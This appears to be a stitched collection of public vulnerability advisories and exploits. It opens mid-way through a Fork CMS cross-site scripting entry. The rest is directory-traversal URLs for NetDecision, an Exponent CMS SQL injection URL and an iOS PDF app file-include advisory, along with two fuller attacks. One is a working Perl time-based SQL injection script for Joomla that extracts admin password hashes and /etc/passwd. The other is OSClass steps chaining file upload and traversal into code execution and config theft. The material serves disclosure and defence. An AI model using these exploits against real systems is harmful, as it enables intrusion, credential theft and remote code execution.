track=s%3A32%3A%22b8cab7d50fd32c5dd3506d0c88edb795%22%3B Host: localhost:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) backend_email=&backend_password=&form=authenticationIndex&form_token="><script>alert("ZSL");</script>&login=Log%20in Parameters: position_1, position_2, position_3, position_4 Method: POST - POST http://localhost/private/en/extensions/edit_theme_template?token=true&id=4 HTTP/1.1 form=edit&form_token=d75161cf347e7b12f53df4cf4082f27a&theme=triton&file=home.tpl&label=Home&position_0=&type_0_0=0&position_1="><script>alert("ZSL");</script>&position_2=left&position_3=right&position_4=top&type_4_0=1&position_5=advertisement&format=%5B%2F%2Cadvertisement%2Cadvertisement%2Cadvertisement%5D%2C%0D%0A%5B%2F%2C%2F%2Ctop%2Ctop%5D%2C%0D%0A%5B%2F%2C%2F%2C%2F%2C%2F%5D%2C%0D%0A%5Bmain%2Cmain%2Cmain%2Cmain%5D%2C%0D%0A%5Bleft%2Cleft%2Cright%2Cright%5D Parameter: success_message Method: POST - POST http://localhost/private/en/form_builder/edit?token=true&id=1 HTTP/1.1 form=edit&form_token=&id=1&name=Contact&method=database_email&inputField-email%5B%5D=jox@jox.com&addValue-email=&email=jox@jox.com&success_message="><script>alert("ZSL");</script>&identifier=contact-en Parameter: smtp_password Method: POST - POST http://localhost/private/en/settings/email HTTP/1.1 form=settingsEmail&form_token=&mailer_type=mail&mailer_from_name=Fork+CMS&mailer_from_email=jox@jox.com&mailer_to_name=Fork+CMS&mailer_to_email=jox@jox.com&mailer_reply_to_name=Fork+CMS&mailer_reply_to_email=jox@jox.com&smtp_server=&smtp_port=&smtp_username=&smtp_password="><script>alert("ZSL");</script> Parameters: site_html_footer, site_html_header Method: POST - POST http://localhost/private/en/settings/index HTTP/1.1 form=settingsIndex&form_token=&site_title=My+website&site_html_header=&site_html_footer="><script>alert("ZSL");</script>&time_format=H%3Ai&date_format_short=j.n.Y&date_format_long=l+j+F+Y&number_format=dot_nothing&fork_api_public_key=f697aac745257271d83bea80f965e3c1&fork_api_private_key=6111a761ec566d325a623e0dcaf614e2&akismet_key=&ckfinder_license_name=Fork+CMS&ckfinder_license_key=QJH2-32UV-6VRM-V6Y7-A91J-W26Z-3F8R&ckfinder_image_max_width=1600&ckfinder_image_max_height=1200&addValue-facebookAdminIds=&facebook_admin_ids=&facebook_application_id=&facebook_application_secret=

source: https://www.securityfocus.com/bid/52327/info NetDecision is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting the issues can allow an attacker to obtain sensitive information that could aid in further attacks. NetDecision 4.6.1 is vulnerable; other versions may also be affected. http://www.example.com:8087/...\...\...\...\...\...\windows\system.ini http://www.example.com:8090/.../.../.../.../.../.../windows/system.ini

source: https://www.securityfocus.com/bid/52312/info Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. #!/usr/bin/perl # Thu Mar 15 22:55:32 CET 2012 A. Ramos <aramosf()unsec.net> # www.securitybydefault.com # Joomla <2.5.1 time based sql injection - vuln by Colin Wong # # using sleep() and not benchmark(), change for < mysql 5.0.12 # # 1.- Database name: database() # 2.- Users data table name: (change 'joomla' for database() result) # select table_name from information_schema.tables where table_schema = "joomla" and table_name like "%_users" # 3.- Admin password: (change zzz_users from previus sql query result) # select password from zzzz_users limit 1 use strict; use LWP::UserAgent; $| = 1; my $url = $ARGV[0]; my $wtime = $ARGV[1]; my $sql = $ARGV[2]; unless ($ARGV[2]) { print "$0 <url> <wait time> <sql>\n"; print "\texamples:\n"; print "\t get admin password:\n"; print "\t\t$0 http://host/joomla/ 3 'database()'\n"; print "\t\t$0 http://host/joomla/ 3 'select table_name from information_schema.tables where table_schema=\"joomla\" and table_name like \"%25_users\"\'\n"; print "\t\t$0 http://host/joomla/ 3 'select password from zzzz_users limit 1'\n"; print "\t get file /etc/passwd\n"; print "\t\t$0 http://host/joomla/ 3 'load_file(\"/etc/passwd\")'\n"; exit 1; } my ($len,$sqldata); my $ua = LWP::UserAgent->new; $ua->timeout(60); $ua->env_proxy; my $stime = time(); my $res = $ua->get($url); my $etime = time(); my $regrtt = $etime - $stime; print "rtt: $regrtt secs\n"; print "vuln?: "; my $sleep = $regrtt + $wtime; $stime = time(); $res = $ua->get($url."/index.php/404' union select sleep($sleep) union select '1"); $etime = time(); my $rtt = $etime - $stime; if ($rtt >= $regrtt + $wtime) { print "ok!\n"; } else { print "nope :(\n"; exit 1; } my $lenoflen; sub len { # length of length for (1..5) { my $sql=$_[0]; $stime = time(); $res = $ua->get($url."/index.php/404' union select if(length(length(($sql)))=$_,sleep($wtime),null) union select '1"); $etime = time(); my $rtt = $etime - $stime; if ($rtt >= $regrtt + $wtime) { $lenoflen = $_; last; } } for (1..$lenoflen) { my $ll; $ll=$_; for (0..9) { my $sql=$_[0]; $stime = time(); $res = $ua->get($url."/index.php/404' union select if(mid(length(($sql)),$ll,1)=$_,sleep($wtime),null) union select '1"); $etime = time(); my $rtt = $etime - $stime; if ($rtt >= $regrtt + $wtime) { $len .= $_; } } } return $len; } sub data { my $sql = $_[0]; my $len = $_[1]; my ($bit, $str, @byte); my $high = 128; for (1..$len) { my $c=8; @byte=""; my $a=$_; for ($bit=1;$bit<=$high;$bit*=2) { $stime = time(); # select if((ord(mid((load_file("/etc/passwd")),1,1)) & 64)=0,sleep(2),null) union select '1'; $res = $ua->get($url."/index.php/404' union select if((ord(mid(($sql),$a,1)) & $bit)=0,sleep($wtime),null) union select '1"); $etime = time(); my $rtt = $etime - $stime; if ($rtt >= $regrtt + $wtime) { $byte[$c]="0"; } else { $byte[$c]="1"; } $c--; } $str = join("",@byte); print pack("B*","$str"); } } $len = len($sql); print "$sql length: $len\n"; print "$sql data:\n\n"; data($sql,$len);

source: https://www.securityfocus.com/bid/52328/info Exponent CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Exponent CMS 2.0.4 is vulnerable; prior versions may also be affected. http://www.example.com//exponent/cron/send_reminders.php?src=src%3d11"%3b}'%20or%201%3d1%20AND%20SLEEP(5)%20%3b%20--%20"

source: https://www.securityfocus.com/bid/52336/info OSClass is prone to a directory-traversal vulnerability and an arbitrary-file-upload vulnerability. An attacker can exploit these issues to obtain sensitive information and to upload arbitrary code and run it in the context of the webserver process. OSClass 2.3.5 is vulnerable; prior versions may also be affected. Arbitrary File Upload Vulnerability: 1. Take a php file and rename it .gif (not really needed since OSClass trusts mime type) 2. Upload that file as picture for a new item and get its name (is 5_small.jpg) 3. Change useragent of your browser to: "Mozilla/4.0 (compatible; MSIE 5.0" . (needed to disable gzip encoding in combine.php) 4. Use combine.php to move itself to oc-content/uploads http://www.example.com/osclass/oc-content/themes/modern/combine.php?type=./../../uploads/combine.php&files=combine.php now we have a copy of combine.php placed into uploads dir (the same dir where our malicius php file has been uploaded) 5. Use uploads/combine.php to move 5_original.php to /remote.php http://www.example.com/osclass/oc-content/uploads/combine.php?files=5_original.jpg&type=/../../remote.php 6. Run the uploaded php file http://www.example.com/osclass/remote.php Directory Traversal Vulnerability: It is possible to download and arbitrary file (ie config.php) under the www root. 1. Change useragent of your browser to: "Mozilla/4.0 (compatible; MSIE 5.0" . (needed to disable gzip encoding) 2. Move combine.php into web root http://www.example.com/osclass/oc-content/themes/modern/combine.php?type=./../../../combine.php&files=combine.php 3. Run combine to download config.php http://www.example.com/osclass/combine.php?files=config.php

Document Title: =============== PDF Converter & Editor 2.1 iOS - File Include Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1480 Release Date: ============= 2015-05-06 Vulnerability Laboratory ID (VL-ID): ==================================== 1480 Common Vulnerability Scoring System: ==================================== 6.9 Product & Service Introduction: =============================== Text Editor & PDF Creator is your all-in-one document management solution for iPhone, iPod touch and iPad. It can catch documents from PC or Mac via USB cable or WIFI, email attachments, Dropbox and box and save it on your iPhone, iPod Touch or iPad locally. (Copy of the Vendor Homepage: https://itunes.apple.com/it/app/text-editor-pdf-creator/id639156936 ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Core Research Team discovered file include web vulnerability in the official AppzCreative - PDF Converter & Text Editor v2.1 iOS mobile web-application. Vulnerability Disclosure Timeline: ================================== 2015-05-06: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== AppzCreative Ltd Product: PDF Converter & Text Editor - iOS Web Application (Wifi) 2.1 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A local file include web vulnerability has been discovered in the official AppzCreative - PDF Converter & Text Editor v2.1 iOS mobile web-application. The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands to compromise the mobile web-application. The web vulnerability is located in the `filename` value of the `submit upload` module. Remote attackers are able to inject own files with malicious `filename` values in the `file upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs in the index file dir listing of the wifi interface. The attacker is able to inject the local file include request by usage of the `wifi interface` in connection with the vulnerable file upload POST method request. Remote attackers are also able to exploit the filename issue in combination with persistent injected script codes to execute different malicious attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST. The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9. Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise. Request Method(s): [+] [POST] Vulnerable Module(s): [+] Submit (Upload) Vulnerable Parameter(s): [+] filename Affected Module(s): [+] Index File Dir Listing (http://localhost:52437/) Proof of Concept (PoC): ======================= The local file include web vulnerability can be exploited by remote attackers (network) without privileged application user account and without user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Install the software to your iOS device 2. Start the mobile ios software and activate the web-server 3. Open the wifi interface for file transfers 4. Start a session tamper and upload a random fil 5. Change in the live tamper by interception of the vulnerable value the filename input (lfi payload) 6. Save the input by processing to continue the request 7. The code executes in the main file dir index list of the local web-server (localhost:52437) 8. Open the link with the private folder and attach the file for successful exploitation with the path value 9. Successful reproduce of the vulnerability! PoC: Upload File (http://localhost:52437/Box/) <div id="module_main"><bq>Files</bq><p><a href="..">..</a><br> <a href="<iframe>2.png"><../[LOCAL FILE INCLUDE VULNERABILITY IN FILENAME!]>2.png</a> ( 0.5 Kb, 2015-04-30 10:58:46 +0000)<br /> </p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1"><label>upload file<input type="file" name="file" id="file" /></label><label><input type="submit" name="button" id="button" value="Submit" /></label></form></div></center></body></html></iframe></a></p></div> --- PoC Session Logs [POST] (LFI - Filename) --- Status: 200[OK] POST http://localhost:52437/Box/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[3262] Mime Type[application/x-unknown-content-type] Request Header: Host[localhost:52437] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://localhost:52437/Box/] Connection[keep-alive] POST-Daten: POST_DATA[-----------------------------321711425710317 Content-Disposition: form-data; name="file"; filename="../[LOCAL FILE INCLUDE VULNERABILITY IN FILENAME!]>2.png" Content-Type: image/png Reference(s): http://localhost:52437/ http://localhost:52437/Box/ Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure validation of the filename value in the upload POST method request. Restrict the filename input and disallow special chars. Ensure that not multiple file extensions are loaded in the filename value to prevent arbitrary file upload attacks. Encode the output in the file dir index list with the vulnerable name value to prevent application-side script code injection attacks. Security Risk: ============== The security rsik of the local file include web vulnerability in the filename value of the wifi service is estimated as high. (CVSS 6.9) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt